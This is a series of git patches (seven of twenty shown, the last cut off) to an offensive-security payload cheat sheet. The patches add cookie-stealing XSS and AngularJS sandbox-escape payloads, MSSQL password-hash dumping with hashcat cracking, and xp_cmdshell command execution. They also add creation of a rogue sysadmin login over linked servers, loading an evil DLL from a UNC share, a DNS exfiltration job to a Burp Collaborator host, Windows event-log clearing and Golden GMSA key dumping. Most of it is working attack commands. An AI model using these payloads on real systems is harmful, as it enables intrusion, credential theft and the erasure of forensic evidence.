From 6c7df7dc4eaf0aacba98d6ad913a41610281fd0c Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Wed, 10 Nov 2021 22:38:02 +0700
Subject: [PATCH 01/20] Update README.md

Add Bypass dot filter
---
 XSS Injection/README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index f17abf32..3c4a24e4 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -663,6 +663,12 @@ You can bypass a single quote with &#39; in an on mousedown event handler
 Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
 http://www.geektools.com/cgi-bin/ipconv.cgi
 
+```javascript
+<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
+```
+
+Base64 encoding your XSS payload with linux command: echo -n "alert(document.cookie)" | base64
+
 ### Bypass parenthesis for string
 
 ```javascript

From e9eac5ca5936bc207b8094de33969e78dd184fd5 Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Wed, 10 Nov 2021 22:40:40 +0700
Subject: [PATCH 02/20] Update README.md

---
 XSS Injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 3c4a24e4..c5c0ffe4 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -667,7 +667,7 @@ http://www.geektools.com/cgi-bin/ipconv.cgi
 <script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
 ```
 
-Base64 encoding your XSS payload with linux command: echo -n "alert(document.cookie)" | base64
+Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
 
 ### Bypass parenthesis for string
 

From 51ac02d3548bfcccf19b043530181082bb4a75d5 Mon Sep 17 00:00:00 2001
From: "Eduardo Barbosa (an4kein)" <37910997+an4kein@users.noreply.github.com>
Date: Tue, 23 Nov 2021 14:04:53 -0300
Subject: [PATCH 03/20] Update README.md

Find open buckets: https://buckets.grayhatwarfare.com/
---
 AWS Amazon Bucket S3/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md
index 97b1fd62..5abe5f91 100644
--- a/AWS Amazon Bucket S3/README.md	
+++ b/AWS Amazon Bucket S3/README.md	
@@ -52,6 +52,7 @@ By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_na
 http://s3.amazonaws.com/[bucket_name]/
 http://[bucket_name].s3.amazonaws.com/
 http://flaws.cloud.s3.amazonaws.com/
+https://buckets.grayhatwarfare.com/
 ```
 
 Their names are also listed if the listing is enabled.

From 5d898e004f07fbdb1a8b4aeaf3f0263d5e0116f8 Mon Sep 17 00:00:00 2001
From: ktq-cyber <khiemtqcyber>
Date: Wed, 23 Feb 2022 22:26:16 +0700
Subject: [PATCH 04/20] [update] Angular XSS payload

---
 XSS Injection/XSS in Angular.md | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)

diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md
index 5a2be103..629699be 100644
--- a/XSS Injection/XSS in Angular.md	
+++ b/XSS Injection/XSS in Angular.md	
@@ -157,6 +157,23 @@ AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter
 {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
 ```
 
+AngularJS (without `'` single and `"` double quotes and `constructor` string)
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
 
 ### Blind XSS
 

From 540d3ca399321618fabb417fa7d5d6aa4eb07ee5 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 5 Mar 2022 18:31:15 +0100
Subject: [PATCH 05/20] Vajra + MSSQL hashes

---
 .../Cloud - Azure Pentest.md                     | 10 +++++++++-
 .../MSSQL Server - Cheatsheet.md                 | 16 ++++++++++++++++
 .../Windows - Privilege Escalation.md            | 10 ++++++++++
 3 files changed, 35 insertions(+), 1 deletion(-)

diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index ca9c9e0c..65dc4d77 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md	
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -13,6 +13,10 @@
     * [Enumeration methodology](#enumeration-methodology)
 * [Phishing with Evilginx2](#phishing-with-evilginx2)
 * [Illicit Consent Grant](#illicit-consent-grant)
+    * [Register Application](#register-application)
+    * [Configure Application](#configure-application)
+    * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated)
+    * [Setup Vajra](#setup-vajra)
 * [Device Code Phish](#device-code-phish)
 * [Token from Managed Identity](#token-from-managed-identity)
     * [Azure API via Powershell](#azure-api-via-powershell)
@@ -396,7 +400,7 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
     * User.ReadBasic.All
     * User.Read
 
-### Setup 365-Stealer
+### Setup 365-Stealer (Deprecated)
 
 :warning: Default port for 365-Stealer phishing is 443
 
@@ -425,6 +429,10 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
     - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
 - Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
 
+### Setup Vajra
+
+> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra
+
 **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
 
 
diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md
index 485649ac..7c693f0b 100644
--- a/Methodology and Resources/MSSQL Server - Cheatsheet.md	
+++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md	
@@ -54,6 +54,7 @@
 	* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
 	* [Exploiting Impersonation](#exploiting-impersonation)
 	* [Exploiting Nested Impersonation](#exploiting-nested-impersonation)
+	* [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
 * [References](#references)
 
 ## Identify Instances and Databases
@@ -537,6 +538,21 @@ SELECT ORIGINAL_LOGIN()
 SELECT SYSTEM_USER
 ```
 
+### MSSQL Accounts and Hashes
+
+```sql
+SELECT name, password_hash FROM sys.sql_logins
+```
+
+Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
+
+```ps1
+131	MSSQL (2000)	0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
+132	MSSQL (2005)	0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
+1731	MSSQL (2012, 2014)	0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
+```
+
+
 ## References
 
 * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 8743b0fc..7aa2995b 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -14,6 +14,7 @@
     * [Default Writeable Folders](#default-writeable-folders)
 * [EoP - Looting for passwords](#eop---looting-for-passwords)
     * [SAM and SYSTEM files](#sam-and-system-files)
+    * [LAPS Settings](#laps-settings)
     * [HiveNightmare](#hivenightmare)
     * [Search for file contents](#search-for-file-contents)
     * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
@@ -394,6 +395,15 @@ samdump2 SYSTEM SAM -o sam.txt
 
 Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash.
 
+### LAPS Settings
+
+Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
+
+* LAPS Enabled: AdmPwdEnabled
+* LAPS Admin Account Name: AdminAccountName
+* LAPS Password Complexity: PasswordComplexity
+* LAPS Password Length: PasswordLength
+* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
 
 ### HiveNightmare
 

From 4abd52697f2fb9be94e0d785c77e4af5119efcd0 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 10 Mar 2022 11:05:17 +0100
Subject: [PATCH 06/20] MSSQL Agent Command Execution

---
 Directory Traversal/README.md                 | 10 ++
 .../Active Directory Attack.md                |  7 +-
 .../MSSQL Server - Cheatsheet.md              | 99 +++++++++++++++++--
 .../Windows - Persistence.md                  |  8 ++
 SQL Injection/MSSQL Injection.md              |  2 +-
 5 files changed, 113 insertions(+), 13 deletions(-)

diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
index e459021e..665af6c1 100644
--- a/Directory Traversal/README.md	
+++ b/Directory Traversal/README.md	
@@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url:
 ```http://nginx-server////////../../```
 
 
+### Java Bypass
+
+Bypass Java's URL protocol
+
+```powershell
+url:file:///etc/passwd
+url:http://127.0.0.1:8080
+```
+
+
 ## Path Traversal
 
 ### Interesting Linux files
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index ef838643..5df6bc9c 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -1264,9 +1264,9 @@ lsadump::lsa /inject /name:krbtgt
 Useful when you want to have the clear text password or when you need to make stats about weak passwords.
 
 Recommended wordlists:
-- rockyou (available in Kali Linux)
-- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
-- Weakpass.com
+- [Rockyou.txt](https://weakpass.com/wordlist/90)
+- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
+- [Weakpass.com](https://weakpass.com/)
 - Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md)
 
 ```powershell
@@ -1282,7 +1282,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
 ```
 
 :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
-- ~~[hashes.org](https://hashes.org/check.php)~~
 - [hashmob.net](https://hashmob.net)
 - [crackstation.net](https://crackstation.net)
 - [hashes.com](https://hashes.com/en/decrypt/hash)
diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md
index 7c693f0b..cfd9e9cb 100644
--- a/Methodology and Resources/MSSQL Server - Cheatsheet.md	
+++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md	
@@ -14,6 +14,8 @@
 	* [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
     * [Dump common information from server to files](#dump-common-information-from-server-to-files)
 * [Linked Database](#linked-database)
+	* [Find Trusted Link](#find-trusted-link)
+	* [Execute Query Through The Link](#execute-query-through-the-link)
 	* [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) 
 	* [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
 	* [Query Version of Linked Database](#query-version-of-linked-database)
@@ -22,7 +24,7 @@
 	* [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
 	* [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
 	* [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
-	* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
+* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
 * [Extended Stored Procedure](#extended-stored-procedure)
 	* [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
 * [CLR Assemblies](#clr-assemblies)
@@ -130,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
 
 ## Linked Database
 
+### Find Trusted Link
+
+```sql
+select * from master..sysservers
+```
+
+### Execute Query Through The Link
+
+```sql
+-- execute query through the link
+select * from openquery("dcorp-sql1", 'select * from master..sysservers')
+select version from openquery("linkedserver", 'select @@version as version');
+
+-- chain multiple openquery
+select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
+
+-- execute shell commands
+EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
+select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
+
+-- create user and give admin privileges
+EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+```
+
 ### Crawl Links for Instances in the Domain 
 A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
 
@@ -195,28 +222,63 @@ Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openque
 ```
 
 
-### Command Execution via xp_cmdshell
+## Command Execution via xp_cmdshell
 
 > xp_cmdshell disabled by default since SQL Server 2005
 
 ```ps1
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
-Creates and adds local user backup to the local administrators group:
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add' -Verbose
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
+
+# Creates and adds local user backup to the local administrators group:
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add'" -Verbose
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
 ```
 
+* Manually execute the SQL query
+	```sql
+	EXEC xp_cmdshell "net user";
+	EXEC master..xp_cmdshell 'whoami'
+	EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
+	EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
+	```
+* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
+	```sql
+	EXEC sp_configure 'show advanced options',1;
+	RECONFIGURE;
+	EXEC sp_configure 'xp_cmdshell',1;
+	RECONFIGURE;
+	```
+* If the procedure was uninstalled
+	```sql
+	sp_addextendedproc 'xp_cmdshell','xplog70.dll'
+	```
+
+
 ## Extended Stored Procedure
 
 ### Add the extended stored procedure and list extended stored procedures
 
 ```ps1
+# Create evil DLL
 Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test
+
+# Load the DLL and call xp_test
 Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'"
 Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "EXEC xp_test"
+
+# Listing existing
 Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
 ```
 
+* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp)
+* Load the DLL
+	```sql
+	-- can also be loaded from UNC path or Webdav
+	sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
+	EXEC xp_calc
+	sp_dropextendedproc 'xp_calc'
+	```
+
 ## CLR Assemblies
 
 Prerequisites:
@@ -322,6 +384,8 @@ GO
 
 ## OLE Automation
 
+* :warning: Disabled by default
+
 ### Execute commands using OLE automation procedures
 
 ```ps1
@@ -365,9 +429,21 @@ Subsystem Options:
 –Subsystem Jscript
 ```
 
+```sql
+USE msdb; 
+EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; 
+EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ;
+EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; 
+EXEC dbo.sp_start_job N'test_powershell_job1';
+
+-- delete
+EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
+```
+
 ### List All Jobs
 
 ```ps1
+SELECT job_id, [name] FROM msdb.dbo.sysjobs;
 Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
 ```
 
@@ -541,7 +617,13 @@ SELECT SYSTEM_USER
 ### MSSQL Accounts and Hashes
 
 ```sql
-SELECT name, password_hash FROM sys.sql_logins
+MSSQL 2000:
+SELECT name, password FROM master..sysxlogins
+SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
+
+MSSQL 2005
+SELECT name, password_hash FROM master.sys.sql_logins
+SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```
 
 Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
@@ -557,4 +639,5 @@ Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.
 
 * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
 * [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
-* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
\ No newline at end of file
+* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
+* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 5e3c9a21..e6a93a08 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -8,6 +8,7 @@
     * [Antivirus Removal](#antivirus-removal)
     * [Disable Windows Defender](#disable-windows-defender)
     * [Disable Windows Firewall](#disable-windows-firewall)
+    * [Clear System and Security Logs](#clear-system-and-security-logs)
 * [Simple User](#simple-user)
     * [Registry HKCU](#registry-hkcu)
     * [Startup](#startup)
@@ -87,6 +88,13 @@ NetSh Advfirewall set allprofiles state off
 New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
 ```
 
+### Clear System and Security Logs
+
+```powershell
+cmd.exe /c wevtutil.exe cl System
+cmd.exe /c wevtutil.exe cl Security
+```
+
 ## Simple User
 
 Set a file as hidden
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index 1ee72f97..920e2ac3 100644
--- a/SQL Injection/MSSQL Injection.md	
+++ b/SQL Injection/MSSQL Injection.md	
@@ -96,7 +96,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee
 
 MSSQL 2005
 SELECT name, password_hash FROM master.sys.sql_logins
-SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```
 
 ## MSSQL Union Based

From d40e0556291289964936e8ed5304d2ac0de925fe Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 15 Mar 2022 11:15:44 +0100
Subject: [PATCH 07/20] Golden GMSA + Scheduled Task

---
 Account Takeover/README.md                    |  8 ++
 .../Active Directory Attack.md                | 99 ++++++++++++-------
 .../Windows - Persistence.md                  | 56 ++++++-----
 3 files changed, 102 insertions(+), 61 deletions(-)

diff --git a/Account Takeover/README.md b/Account Takeover/README.md
index 8bc027e6..23afbe20 100644
--- a/Account Takeover/README.md	
+++ b/Account Takeover/README.md	
@@ -10,6 +10,7 @@
     * [Weak Password Reset Token](#weak-password-reset-token)
     * [Leaking Password Reset Token](#leaking-password-reset-token)
     * [Password Reset Via Username Collision](#password-reset-via-username-collision)
+    * [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue)
 * [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
 * [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
 * [Account Takeover via CSRF](#account-takeover-via-csrf)
@@ -116,6 +117,13 @@ Try to determine if the token expire or if it's always the same, in some cases t
 The platform CTFd was vulnerable to this attack. 
 See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
 
+
+### Account takeover due to unicode normalization issue
+
+- Victim account: `demo@gmail.com`
+- Attacker account: `demⓞ@gmail.com`
+
+
 ## Account Takeover Via Cross Site Scripting
 
 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 5df6bc9c..527b4f82 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -48,6 +48,7 @@
     - [Password in AD User comment](#password-in-ad-user-comment)
     - [Reading LAPS Password](#reading-laps-password)
     - [Reading GMSA Password](#reading-gmsa-password)
+    - [Forging Golden GMSA](#forging-golden-gmsa)
     - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
       - [Using Mimikatz](#using-mimikatz)
       - [Using Meterpreter](#using-meterpreter)
@@ -1389,40 +1390,7 @@ or dump the Active Directory and `grep` the content.
 ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
 ```
 
-### Reading GMSA Password
 
-> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed.
-
-#### GMSA Attributes in the Active Directory 
-* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password.
-* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts.
-* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
-* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
-
-
-#### Extract NT hash from the Active Directory
-
-* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#)
-  ```ps1
-  # https://github.com/rvazarkar/GMSAPasswordReader
-  GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
-  ```
-
-* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper)
-   ```powershell
-  # https://github.com/micahvandeusen/gMSADumper
-  python3 gMSADumper.py -u User -p Password1 -d domain.local
-  ```
-  
-* Active Directory Powershell
-  ```ps1
-  $gmsa =  Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
-  $blob = $gmsa.'msDS-ManagedPassword'
-  $mp = ConvertFrom-ADManagedPasswordBlob $blob
-  $hash1 =  ConvertTo-NTHash -Password $mp.SecureCurrentPassword
-  ```
-
-* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module
 
 ### Reading LAPS Password
 
@@ -1470,7 +1438,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
        foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
        ```
 
- - From linux:
+ - From Linux:
 
    * [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords:
        ```bash
@@ -1496,6 +1464,68 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
       ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
       ```
      
+
+### Reading GMSA Password
+
+> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes.
+
+#### GMSA Attributes in the Active Directory 
+* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password.
+* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts.
+* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
+* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
+
+
+#### Extract NT hash from the Active Directory
+
+* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#)
+  ```ps1
+  # https://github.com/rvazarkar/GMSAPasswordReader
+  GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
+  ```
+
+* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper)
+   ```powershell
+  # https://github.com/micahvandeusen/gMSADumper
+  python3 gMSADumper.py -u User -p Password1 -d domain.local
+  ```
+  
+* Active Directory Powershell
+  ```ps1
+  $gmsa =  Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
+  $blob = $gmsa.'msDS-ManagedPassword'
+  $mp = ConvertFrom-ADManagedPasswordBlob $blob
+  $hash1 =  ConvertTo-NTHash -Password $mp.SecureCurrentPassword
+  ```
+
+* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module
+
+
+### Forging Golden GMSA
+
+> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.
+
+* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA)
+    ```ps1
+    # Enumerate all gMSAs
+    GoldenGMSA.exe gmsainfo
+    # Query for a specific gMSA
+    GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112
+
+    # Dump all KDS Root Keys
+    GoldenGMSA.exe kdsinfo
+    # Dump a specific KDS Root Key
+    GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb
+
+    # Compute gMSA password
+    # --sid <gMSA SID>: SID of the gMSA (required)
+    # --kdskey <Base64-encoded blob>: Base64 encoded KDS Root Key
+    # --pwdid <Base64-encoded blob>: Base64 of msds-ManagedPasswordID attribute value
+    GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain
